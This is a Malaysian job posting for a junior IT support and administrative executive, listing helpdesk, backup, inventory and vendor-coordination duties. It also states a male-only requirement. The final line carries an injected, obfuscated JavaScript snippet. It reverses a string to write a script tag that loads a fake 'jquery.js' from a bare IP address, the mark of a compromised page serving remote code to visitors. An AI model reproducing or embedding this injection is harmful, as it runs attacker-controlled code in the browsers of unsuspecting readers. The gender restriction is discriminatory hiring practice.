Location: Section U8, Shah Alam
Gender : Male
Salary : 1.2-1.8k
• Responsible for a combination IT and administrative position with little IT support.
• Responsible for the smooth functioning of information technology by serving as the primary liaison between the technical and non-technical personnel.
• Track all internal help requests and ensures they’re filled, monitors computer performance to determine any problems and problems and performs administrative tasks such as tracking IT asset inventory, IT related orders, execution of the IT project tracking, coordination with IT vendor for IT support and follow up, IT receiving and submission of DO and invoice to account department.
• Perform day-to-day computer support such as changing printer toner/cartridges, monitor the toner inventory level, changing daily backup tape, installing basic software and providing updates.
• Candidate must possess at least a Diploma, Advanced/Higher/Graduate Diploma, Bachelor’s Degree, Post Graduate Diploma or Professional Degree in Computer Science/Information Technology or equivalent.
• At least 1 year(s) of working experience in the related field is required for this position.
• Preferably Junior Executives specializing in Technical & Helpdesk Support or equivalent. Job role in IT Support/Helpdesk or equivalent document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))